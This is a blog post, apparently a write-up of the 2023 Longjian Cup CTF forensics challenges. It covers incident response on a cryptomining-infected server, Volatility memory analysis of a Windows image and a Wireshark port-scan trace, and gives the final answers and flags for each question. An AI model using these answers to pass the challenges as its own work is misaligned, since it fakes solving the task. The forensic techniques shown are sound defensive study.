<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="cvbxy">
    
    <title>
        
            2023陇剑杯 |
        
        cvbxy
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
        <link rel="shortcut icon" href="/images/logo.png">
    
    
<link rel="stylesheet" href="/font/css/fontawesome.min.css">

    
<link rel="stylesheet" href="/font/css/regular.min.css">

    
<link rel="stylesheet" href="/font/css/solid.min.css">

    
<link rel="stylesheet" href="/font/css/brands.min.css">

    
    <script class="keep-theme-configurations">
    const KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"cvbxy.github.io","root":"/","language":"zh-CN","path":"search.json"}
    KEEP.theme_config = {"base_info":{"primary_color":"#0066cc","title":"cvbxy","author":"cvbxy","avatar":"/images/avatar.png","logo":"/images/logo.png","favicon":"/images/logo.png"},"menu":{"home":"/","archives":"/archives","tags":"/tags","categories":"/categories","about":"/about"},"first_screen":{"enable":false,"background_img":"/images/bg.svg","background_img_dark":"/images/bg.svg","description":"Keep writing and Keep loving.","hitokoto":false},"social_contact":{"enable":false,"links":{"github":null,"weixin":null,"qq":null,"weibo":null,"zhihu":null,"twitter":null,"x":null,"facebook":null,"email":null}},"scroll":{"progress_bar":false,"percent":false,"hide_header":true},"home":{"announcement":null,"category":true,"tag":true,"post_datetime":"created"},"post":{"author_badge":{"enable":true,"level_badge":true,"custom_badge":["One","Two","Three"]},"word_count":{"wordcount":false,"min2read":false},"datetime_format":"YYYY-MM-DD HH:mm:ss","copyright_info":false,"share":false,"reward":{"enable":false,"img_link":null,"text":null,"icon":null}},"code_block":{"tools":{"enable":true,"style":"mac"},"highlight_theme":"default"},"toc":{"enable":true,"number":false,"expand_all":false,"init_open":true,"layout":"right"},"website_count":{"busuanzi_count":{"enable":false,"site_uv":false,"site_pv":false,"page_pv":false}},"local_search":{"enable":true,"preload":true},"comment":{"enable":false,"use":"valine","valine":{"appid":null,"appkey":null,"server_urls":null,"placeholder":null},"gitalk":{"github_id":null,"github_admins":null,"repository":null,"client_id":null,"client_secret":null,"proxy":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.36"},"waline":{"server_url":null,"reaction":false,"version":"3.2.1"},"giscus":{"repo":null,"repo_id":null,"category":"Announcements","category_id":null,"reactions_enabled":false},"artalk":{"server":null},"disqus":{"shortname":null}},"rss":{"enable":false},"lazyload":{"enable":false},"cdn":{"enable":false,"provider":"cdnjs"},"pjax":{"enable":false},"footer":{"since":2023,"word_count":true,"site_deploy":{"enable":false,"provider":"github","url":null},"record":{"enable":false,"list":[{"code":null,"link":null}]}},"inject":{"enable":false,"css":[null],"js":[null]},"root":"","source_data":{},"version":"4.2.0"}
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"}
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"}
    KEEP.language_copy_copyright = {"copy":"复制版权信息","copied":"已复制","title":"原文标题","author":"原文作者","link":"原文链接"}
  </script>
<meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="cvbxy's blog" type="application/atom+xml">
</head>


<body>
<div class="progress-bar-container">
    

    
</div>



<main class="page-container border-box">
    <!-- home first screen  -->
    

    <!-- page content -->
    <div class="page-main-content border-box">
        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="border-box header-content">
        <div class="left flex-start border-box">
            
                <a class="logo-image border-box" href="/">
                    <img src="/images/logo.png">
                </a>
            
            <a class="site-name border-box" href="/">
               cvbxy
            </a>
        </div>

        <div class="right border-box">
            <div class="pc border-box">
                <ul class="menu-list border-box">
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/">
                                
                                首页
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/archives">
                                
                                归档
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/tags">
                                
                                标签
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/categories">
                                
                                分类
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/about">
                                
                                关于
                                
                            </a>
                            
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="menu-text-color fas search fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile border-box flex-start">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list border-box">
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/">
                            
                            首页
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/archives">
                            
                            归档
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/tags">
                            
                            标签
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/categories">
                            
                            分类
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/about">
                            
                            关于
                        </a>
                        
                    </label>
                    
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle border-box">

            <div class="main-content border-box">
                

                    
<div class="fade-in-down-animation">
    <div class="post-page-container border-box">
        <div class="post-content-container border-box">
            

            <div class="post-content-bottom border-box">
                
                    <div class="post-title">
                        2023陇剑杯
                    </div>
                

                
                    <div class="post-header border-box">
                        
                            <div class="avatar-box border-box">
                                <img src="/images/avatar.png">
                            </div>
                        
                        <div class="info-box">
                            <div class="author border-box">
                                <span class="name">cvbxy</span>
                                
                                    <span class="author-badge">Lv1</span>
                                
                            </div>
                            <div class="meta-info border-box">
                                

<div class="post-meta-info-container border-box post">
    <div class="post-meta-info border-box">
        

        
            <span class="meta-info-item post-create-date">
                <i class="icon fa-solid fa-calendar-plus"></i>&nbsp;
                <span class="datetime">2024-06-20 16:06:06</span>
            </span>

            <span class="meta-info-item post-update-date">
                <i class="icon fa-solid fa-file-pen"></i>&nbsp;
                <span class="datetime" data-updated="Wed Jul 17 2024 22:35:49 GMT+0800">2024-07-17 22:35:49</span>
            </span>
        

        
            <span class="meta-info-item post-category border-box"><i class="icon fas fa-folder"></i>&nbsp;
                <ul class="post-category-ul">
                    
                            <li class="category-item"><a href="/categories/CTF/">CTF</a></li>
                        
                    
                </ul>
            </span>
        

        
            <span class="post-tag meta-info-item border-box">
                <ul class="post-tag-ul">
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90/">流量分析</a></li>
                        
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/%E5%8F%96%E8%AF%81/">取证</a></li>
                        
                    
                </ul>
            </span>
        

        
        
        
        
    </div>

    
</div>

                            </div>
                        </div>
                    </div>
                

                <div class="post-content keep-markdown-body ">
                    

                    
                         <h3 id="IncidentResponse"><a href="#IncidentResponse" class="headerlink" title="IncidentResponse"></a>IncidentResponse</h3><blockquote>
<p>你是公司的一名安全运营工程师，今日接到外部监管部门通报，你公司网络出口存在请求挖矿域名的行为。需要立即整改。经过与网络组配合，你们定位到了请求挖矿域名的内网IP是10.221.36.21。查询CMDB后得知该IP运行了公司的工时系统。（虚拟机账号密码为：root&#x2F;IncidentResponsePasswd）<br>挖矿程序所在路径是？（答案中如有空格均需去除，如有大写均需变为小写，使用echo -n ‘strings’|md5sum|cut -d ‘ ‘ -f1获取md5值作为答案）<br>本题附件见于平台公告的IR.zip，解压密码为f0b1ba11478343f404666c355919de3f<br>echo -n ‘&#x2F;etc&#x2F;redis&#x2F;redis-server’|md5sum|cut -d ‘ ‘ -f1<br>6f72038a870f05cbf923633066e48881</p>
</blockquote>
<p>对ova文件用r-studio进行恢复，把vmdk文件提取出来</p>
<p><img   src="/images/blogimg/1706702667214-935e885f-38f0-400d-a573-f3e1ed55995b.png" ></p>
<p>用DiskGenius恢复vmdk里面的文件</p>
<p><img   src="/images/blogimg/1706702694143-b64ae039-ff7a-4db9-b653-2c9915a06581.png" ></p>
<p>ova导入虚拟机，<code>ps -ef</code> 查看运行的进程</p>
<p><img   src="/images/blogimg/1706702702919-374abd92-8660-4745-a746-4acc52c5498a.png" ></p>
<p>发现&#x2F;etc&#x2F;redis目录下有可疑文件</p>
<p><img   src="/images/blogimg/1706702718567-ba742dfd-a9f9-4cd5-8d6e-91ca6fbd6d0d.png" ></p>
<blockquote>
<p>挖矿程序连接的矿池域名是？（答案中如有空格均需去除，如有大写均需变为小写，使用echo -n ‘strings’|md5sum|cut -d ‘ ‘ -f1获取md5值作为答案）<br>echo -n ‘donate.v2.xmrig.com’|md5sum|cut -d ‘ ‘ -f1<br>3fca20bb92d0ed67714e68704a0a4503</p>
</blockquote>
<p><img   src="/images/blogimg/1706702725580-c76af453-2010-4139-aada-e4001b56c62c.png" ></p>
<blockquote>
<p>攻击者入侵服务器的利用的方法是？（答案中如有空格均需去除，如有大写均需变为小写，使用echo -n ‘strings’|md5sum|cut -d ‘ ‘ -f1获取md5值作为答案）<br>题目提示：答案md5值前两位为3e<br>echo -n ‘shirodeserialization’|md5sum|cut -d ‘ ‘ -f1<br>3ee726cb32f87a15d22fe55fa04c4dcd</p>
</blockquote>
<p>&#x2F;home&#x2F;app目录下的log里面可以找到shiro的报错，应该是shiro反序列化</p>
<p><img   src="/images/blogimg/1706702733168-ca7cd749-4ef2-4ab0-9074-308d03ffc582.png" ></p>
<blockquote>
<p>攻击者的IP是？（答案中如有空格均需去除，如有大写均需变为小写，使用echo -n ‘strings’|md5sum|cut -d ‘ ‘ -f1获取md5值作为答案）<br>echo -n ‘81.70.166.3’|md5sum|cut -d ‘ ‘ -f1<br>c76b4b1a5e8c9e7751af4684c6a8b2c9</p>
</blockquote>
<p>查看日志</p>
<p><img   src="/images/blogimg/1706702764622-f2a25ca1-8977-44a5-93f4-ba999244681d.png" ></p>
<p><img   src="/images/blogimg/1706702769449-4b362aa3-91d7-47bc-bfae-ab713370303b.png" ></p>
<blockquote>
<p>攻击者发起攻击时使用的User-Agent是？（答案中如有空格均需去除，如有大写均需变为小写，使用echo -n ‘strings’|md5sum|cut -d ‘ ‘ -f1获取md5值作为答案）<br>echo -n ‘mozilla&#x2F;5.0(compatible;baiduspider&#x2F;2.0;+<a class="link"   target="_blank" rel="noopener" href="http://www.baidu.com/search/spider.html)'|md5sum|cut" >http://www.baidu.com/search/spider.html)&#39;|md5sum|cut<i class="fas fa-external-link-alt"></i></a> -d ‘ ‘ -f1<br>6ba8458f11f4044cce7a621c085bb3c6</p>
</blockquote>
<p>日志文件末尾的POST包</p>
<p><img   src="/images/blogimg/1706702777901-0bf41029-6ff6-4bf8-8bf3-c4c3dd822c18.png" ></p>
<blockquote>
<p>攻击者使用了两种权限维持手段，相应的配置文件路径是？(md5加密后以a开头)（答案中如有空格均需去除，如有大写均需变为小写，使用echo -n ‘strings’|md5sum|cut -d ‘ ‘ -f1获取md5值作为答案）<br>echo -n ‘&#x2F;root&#x2F;.ssh&#x2F;authorized_keys’|md5sum|cut -d ‘ ‘ -f1<br>a1fa1b5aeb1f97340032971c342c4258</p>
</blockquote>
<p>在流量包里面发现了修改root的authorized_keys</p>
<blockquote>
<p>攻击者使用了两种权限维持手段，相应的配置文件路径是？(md5加密后以b开头)（答案中如有空格均需去除，如有大写均需变为小写，使用echo -n ‘strings’|md5sum|cut -d ‘ ‘ -f1获取md5值作为答案）<br>echo -n ‘&#x2F;lib&#x2F;systemd&#x2F;system&#x2F;redis.service’|md5sum|cut -d ‘ ‘ -f1<br>b2c5af8ce08753894540331e5a947d35</p>
</blockquote>
<p>查找所有与redis相关的文件，看到一个疑似开机自启的服务</p>
<p><img   src="/images/blogimg/1706702806491-657b94a1-6abf-4ee2-b8ed-bec9c46ea11d.png" ></p>
<h3 id="baby-forensics"><a href="#baby-forensics" class="headerlink" title="baby_forensics"></a>baby_forensics</h3><blockquote>
<p>磁盘中的key是多少？<br>本题附件见于平台公告的BF.zip，解压密码为4cf611fce4a2fec305e54c2766b7c860<br>2e80307085fd2b5c49c968c323ee25d5</p>
</blockquote>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[/tmp]</span><br><span class="line">└─<span class="comment"># vol.py -f baby.raw imageinfo</span></span><br><span class="line">Volatility Foundation Volatility Framework 2.6.1</span><br><span class="line">INFO    : volatility.debug    : Determining profile based on KDBG search...</span><br><span class="line">          Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_24000, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_24000, Win7SP1x64_23418</span><br><span class="line">                     AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)</span><br><span class="line">                     AS Layer2 : FileAddressSpace (/tmp/baby.raw)</span><br><span class="line">                      PAE <span class="built_in">type</span> : No PAE</span><br><span class="line">                           DTB : 0x187000L</span><br><span class="line">                          KDBG : 0xf800040420a0L</span><br><span class="line">          Number of Processors : 4</span><br><span class="line">     Image Type (Service Pack) : 1</span><br><span class="line">                KPCR <span class="keyword">for</span> CPU 0 : 0xfffff80004043d00L</span><br><span class="line">                KPCR <span class="keyword">for</span> CPU 1 : 0xfffff880009ef000L</span><br><span class="line">                KPCR <span class="keyword">for</span> CPU 2 : 0xfffff88004569000L</span><br><span class="line">                KPCR <span class="keyword">for</span> CPU 3 : 0xfffff880045df000L</span><br><span class="line">             KUSER_SHARED_DATA : 0xfffff78000000000L</span><br><span class="line">           Image <span class="built_in">date</span> and time : 2022-05-29 12:14:16 UTC+0000</span><br><span class="line">     Image <span class="built_in">local</span> <span class="built_in">date</span> and time : 2022-05-29 20:14:16 +0800</span><br><span class="line"></span><br><span class="line">┌──(root㉿kali)-[/tmp]</span><br><span class="line">└─<span class="comment"># vol.py -f baby.raw --profile=Win7SP1x64 filescan | grep &quot;key.txt&quot; </span></span><br><span class="line">Volatility Foundation Volatility Framework 2.6.1</span><br><span class="line">0x000000003df80070      2      0 -W-rwd \Device\HarddiskVolume2\Users\admin\AppData\Local\Temp\vmware-admin\VMwareDnD\abafa01a\key.txt</span><br><span class="line">0x000000003df94070     16      0 RW---- \Device\HarddiskVolume3\key.txt</span><br><span class="line"></span><br><span class="line">┌──(root㉿kali)-[/tmp]</span><br><span class="line">└─<span class="comment"># vol.py -f baby.raw --profile=Win7SP1x64 dumpfiles -Q &#x27;0x000000003df80070&#x27; -D /tmp</span></span><br><span class="line">Volatility Foundation Volatility Framework 2.6.1</span><br><span class="line">DataSectionObject 0x3df80070   None   \Device\HarddiskVolume2\Users\admin\AppData\Local\Temp\vmware-admin\VMwareDnD\abafa01a\key.txt</span><br><span class="line"></span><br><span class="line">┌──(root㉿kali)-[/tmp]</span><br><span class="line">└─<span class="comment"># cat file.None.0xfffffa800e7f96f0.dat </span></span><br><span class="line">E96&lt;6J:Da6g_b_f_gd75a3d4ch4heg4bab66ad5d</span><br></pre></td></tr></table></figure>

<p><img   src="/images/blogimg/1706703025431-92091c6d-335e-436a-9048-3a16a15637a3.png" ></p>
<blockquote>
<p>电脑中正在运行的计算器的运行结果是多少？<br>7598632541</p>
</blockquote>
<h4 id="方法一"><a href="#方法一" class="headerlink" title="方法一"></a>方法一</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[/tmp]</span><br><span class="line">└─<span class="comment"># vol.py -f baby.raw --profile=Win7SP1x64 windows &gt; dump</span></span><br><span class="line"><span class="comment"># windoes:Print Desktop Windows (verbose details)</span></span><br></pre></td></tr></table></figure>

<p><img   src="/images/blogimg/1706703038999-16246204-6664-4b2a-b282-b065e5acefd4.png" ></p>
<h4 id="方法二"><a href="#方法二" class="headerlink" title="方法二"></a>方法二</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[/tmp]</span><br><span class="line">└─<span class="comment"># vol.py -f baby.raw --profile=Win7SP1x64 psscan        </span></span><br><span class="line">Volatility Foundation Volatility Framework 2.6.1</span><br><span class="line">Offset(P)          Name                PID   PPID PDB                Time created                   Time exited                   </span><br><span class="line">------------------ ---------------- ------ ------ ------------------ ------------------------------ ------------------------------</span><br><span class="line">0x000000003dd2cb30 calc.exe           2844   2552 0x000000000eb93000 2022-05-29 11:50:36 UTC+0000                                 </span><br><span class="line">0x000000003ddbeb30 StikyNot.exe       2968   2552 0x00000000366e7000 2022-05-29 12:05:25 UTC+0000                                 </span><br><span class="line">0x000000003de20910 explorer.exe       2552   2516 0x0000000032058000 2022-04-14 11:14:06 UTC+0000                                 </span><br><span class="line">0x000000003de22060 dwm.exe            2528    884 0x0000000031ee7000 2022-04-14 11:14:06 UTC+0000                                 </span><br><span class="line">0x000000003de4b6b0 WmiPrvSE.exe       2312    644 0x0000000032adc000 2022-04-14 11:14:03 UTC+0000                                 </span><br><span class="line">0x000000003df62890 vmtoolsd.exe       2660   2552 0x000000002b715000 2022-04-14 11:14:07 UTC+0000                                 </span><br><span class="line">0x000000003dfda910 SearchIndexer.     2884    520 0x0000000026bf8000 2022-04-14 11:14:13 UTC+0000                                 </span><br><span class="line">0x000000003e014060 rundll32.exe       2104    644 0x0000000000c26000 2022-04-14 11:14:02 UTC+0000                                 </span><br><span class="line">0x000000003e021b30 vmtoolsd.exe       1544    520 0x000000000dd3b000 2022-04-14 11:14:02 UTC+0000                                 </span><br><span class="line">0x000000003e075b30 taskhost.exe       1696    520 0x000000000a03b000 2022-04-14 11:14:02 UTC+0000                                 </span><br><span class="line">0x000000003e10f630 sppsvc.exe         1952    520 0x0000000007832000 2022-04-14 11:14:02 UTC+0000                                 </span><br><span class="line">0x000000003e148820 svchost.exe        2016    520 0x0000000007a03000 2022-04-14 11:14:02 UTC+0000                                 </span><br><span class="line">0x000000003e197630 dllhost.exe        1792    520 0x0000000006b10000 2022-04-14 11:14:02 UTC+0000                                 </span><br><span class="line">0x000000003e243b30 spoolsv.exe        1148    520 0x00000000122cf000 2022-04-14 11:14:01 UTC+0000                                 </span><br><span class="line">0x000000003e275b30 svchost.exe        1180    520 0x0000000011b4d000 2022-04-14 11:14:01 UTC+0000                                 </span><br><span class="line">0x000000003e302440 taskhost.exe       1748    520 0x0000000021982000 2022-05-29 11:43:51 UTC+0000                                 </span><br><span class="line">0x000000003e335b30 svchost.exe        1320    520 0x0000000010492000 2022-04-14 11:14:02 UTC+0000                                 </span><br><span class="line">0x000000003e3aab30 VGAuthService.     1404    520 0x000000000f15c000 2022-04-14 11:14:02 UTC+0000                                 </span><br><span class="line">0x000000003e3f9400 svchost.exe        2976    520 0x000000000bfc6000 2022-05-29 11:44:06 UTC+0000                                 </span><br><span class="line">0x000000003e430360 wmpnetwk.exe       1064    520 0x0000000014c8c000 2022-05-29 11:44:07 UTC+0000                                 </span><br><span class="line">0x000000003e436b30 svchost.exe         644    520 0x00000000185ed000 2022-04-14 11:14:01 UTC+0000                                 </span><br><span class="line">0x000000003e45f460 vmacthlp.exe        708    520 0x0000000018550000 2022-04-14 11:14:01 UTC+0000                                 </span><br><span class="line">0x000000003e47e5f0 svchost.exe         752    520 0x0000000017ad6000 2022-04-14 11:14:01 UTC+0000                                 </span><br><span class="line">0x000000003e4bb740 svchost.exe         840    520 0x0000000017ce9000 2022-04-14 11:14:01 UTC+0000                                 </span><br><span class="line">0x000000003e4e4b30 svchost.exe         884    520 0x00000000172f0000 2022-04-14 11:14:01 UTC+0000                                 </span><br><span class="line">0x000000003e4edb30 svchost.exe         908    520 0x000000001723e000 2022-04-14 11:14:01 UTC+0000                                 </span><br><span class="line">0x000000003e566830 svchost.exe         368    520 0x00000000164c5000 2022-04-14 11:14:01 UTC+0000                                 </span><br><span class="line">0x000000003e59eb30 svchost.exe         988    520 0x0000000015dce000 2022-04-14 11:14:01 UTC+0000                                 </span><br><span class="line">0x000000003e733b30 msdtc.exe          2092    520 0x000000003b51a000 2022-04-14 11:14:02 UTC+0000                                 </span><br><span class="line">0x000000003e75d510 wininit.exe         412    344 0x000000001acc3000 2022-04-14 11:14:00 UTC+0000                                 </span><br><span class="line">0x000000003e768460 csrss.exe           420    404 0x000000001ac8a000 2022-04-14 11:14:00 UTC+0000                                 </span><br><span class="line">0x000000003e798b30 winlogon.exe        468    404 0x000000001a390000 2022-04-14 11:14:00 UTC+0000                                 </span><br><span class="line">0x000000003e7ba7c0 services.exe        520    412 0x0000000018e7b000 2022-04-14 11:14:01 UTC+0000                                 </span><br><span class="line">0x000000003e7c4b30 lsass.exe           536    412 0x0000000018da3000 2022-04-14 11:14:01 UTC+0000                                 </span><br><span class="line">0x000000003e7cb7b0 lsm.exe             544    412 0x000000001906b000 2022-04-14 11:14:01 UTC+0000                                 </span><br><span class="line">0x000000003ee32530 dllhost.exe        3420    644 0x0000000024b7a000 2022-05-29 12:14:17 UTC+0000                                 </span><br><span class="line">0x000000003ee8d590 DumpIt.exe         3212   2552 0x0000000001cdf000 2022-05-29 12:14:13 UTC+0000                                 </span><br><span class="line">0x000000003ee92060 conhost.exe        3236    420 0x0000000012664000 2022-05-29 12:14:13 UTC+0000                                 </span><br><span class="line">0x000000003ef11790 dllhost.exe        2488    644 0x0000000001f1a000 2022-05-29 12:14:13 UTC+0000                                 </span><br><span class="line">0x000000003efa76f0 dllhost.exe        2836    644 0x0000000037d5a000 2022-05-29 12:14:13 UTC+0000                                 </span><br><span class="line">0x000000003efd0790 dllhost.exe        2488    644 0x0000000001f1a000 2022-05-29 12:14:13 UTC+0000                                 </span><br><span class="line">0x000000003f1ab060 dllhost.exe        3364    644 0x0000000032a08000 2022-05-29 12:13:10 UTC+0000                                 </span><br><span class="line">0x000000003f1adb30 SearchFilterHo     3936   2884 0x000000000ec8c000 2022-05-29 12:14:00 UTC+0000                                 </span><br><span class="line">0x000000003f1e0060 taskhost.exe       3244    520 0x0000000020df5000 2022-05-29 12:13:06 UTC+0000                                 </span><br><span class="line">0x000000003f1e9060 iexplore.exe       3532   3480 0x0000000025a35000 2022-05-29 12:13:21 UTC+0000                                 </span><br><span class="line">0x000000003f1f6b30 SearchProtocol     3916   2884 0x000000001b2e9000 2022-05-29 12:14:00 UTC+0000                                 </span><br><span class="line">0x000000003f2e7780 iexplore.exe       3480   2552 0x00000000115d5000 2022-05-29 12:13:21 UTC+0000                                 </span><br><span class="line">0x000000003f5a6b30 csrss.exe           360    344 0x000000001b6bd000 2022-04-14 11:14:00 UTC+0000                                 </span><br><span class="line">0x000000003f5af6f0 audiodg.exe        1276    840 0x0000000039805000 2022-05-29 12:07:28 UTC+0000                                 </span><br><span class="line">0x000000003f5fb650 smss.exe            268      4 0x00000000204fc000 2022-04-14 11:13:59 UTC+0000                                 </span><br><span class="line">0x000000003fe39060 iexplore.exe       3824   3480 0x0000000014820000 2022-05-29 12:13:59 UTC+0000                                 </span><br><span class="line">0x000000003ff40b30 System                4      0 0x0000000000187000 2022-04-14 11:13:59 UTC+0000                                 </span><br><span class="line">                                                                                                                                                              </span><br><span class="line">┌──(root㉿kali)-[/tmp]</span><br><span class="line">└─<span class="comment"># vol.py -f baby.raw --profile=Win7SP1x64 memdump -p 2844 -D /tmp</span></span><br><span class="line">Volatility Foundation Volatility Framework 2.6.1</span><br><span class="line">************************************************************************</span><br><span class="line">Writing calc.exe [  2844] to 2844.dmp</span><br></pre></td></tr></table></figure>

<p>将后缀改成data，然后用gimp查看data</p>
<p><img   src="/images/blogimg/1706703063960-74f4498a-259f-44f3-995b-bf41b79996c1.png" ></p>
<blockquote>
<p>该内存文件中存在的flag值是多少？<br>flag{ad9bca48-c7b0-4bd6-b6fb-aef90090bb98}</p>
</blockquote>
<h4 id="方法一-1"><a href="#方法一-1" class="headerlink" title="方法一"></a>方法一</h4><p>导出StikyNot.exe，将后缀改成data，然后用gimp查看data</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[/tmp]</span><br><span class="line">└─<span class="comment"># vol.py -f baby.raw --profile=Win7SP1x64 memdump -p 2968 -D /tmp</span></span><br><span class="line">Volatility Foundation Volatility Framework 2.6.1</span><br><span class="line">************************************************************************</span><br><span class="line">Writing StikyNot.exe [  2968] to 2968.dmp</span><br></pre></td></tr></table></figure>

<p><img   src="/images/blogimg/1706703086415-03113fcc-53e5-4425-96f3-575373f24361.png" ></p>
<p><img   src="/images/blogimg/1706703095127-99e72356-e47f-4a8e-a71c-9c67c6197040.png" ></p>
<h4 id="方法二-1"><a href="#方法二-1" class="headerlink" title="方法二"></a>方法二</h4><p>将raw文件直接用010打开，然后可以发现疑似密文的东西</p>
<p><img   src="/images/blogimg/1706703104975-b81f6cca-f21c-43b8-8a68-e0d903898cb9.png" ></p>
<p>疑似密码，用aes解密</p>
<p><img   src="/images/blogimg/1706703127789-89b5a477-3b81-4fa1-a6c0-5ac699af868b.png" ></p>
<p><img   src="/images/blogimg/1706703131576-01e40753-46ca-4077-b838-7de139778185.png" ></p>
<h3 id="hard-web"><a href="#hard-web" class="headerlink" title="hard_web"></a>hard_web</h3><blockquote>
<p>服务器开放了哪些端口，请按照端口大小顺序提交答案，并以英文逗号隔开(如服务器开放了80 81 82 83端口，则答案为80,81,82,83)<br>80,888,8888</p>
</blockquote>
<p>统计→会话可以发现存在端口扫描行为</p>
<p><img   src="/images/blogimg/1706703834124-8259ba3f-abf1-44dc-8166-e7a8143642f2.png" ></p>
<p> 可以发现80,888,,8888三个端口</p>
<p><img   src="/images/blogimg/1706702419897-49846437-f65c-48a8-ae68-7db6ba165597.png" ></p>
<figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tcp.connection.synack and ip.dst<span class="operator">=</span><span class="operator">=</span><span class="number">192.168</span>.<span class="number">162.180</span></span><br></pre></td></tr></table></figure>

<blockquote>
<p>服务器中根目录下的flag值是多少？<br>flag{9236b29d-5488-41e6-a04b-53b0d8276542}</p>
</blockquote>
<p>网站本身就存在的木马test.jsp</p>
<p><img   src="/images/blogimg/1706702448265-9bc36267-9762-4230-8b5f-70b92f65398f.png" ></p>
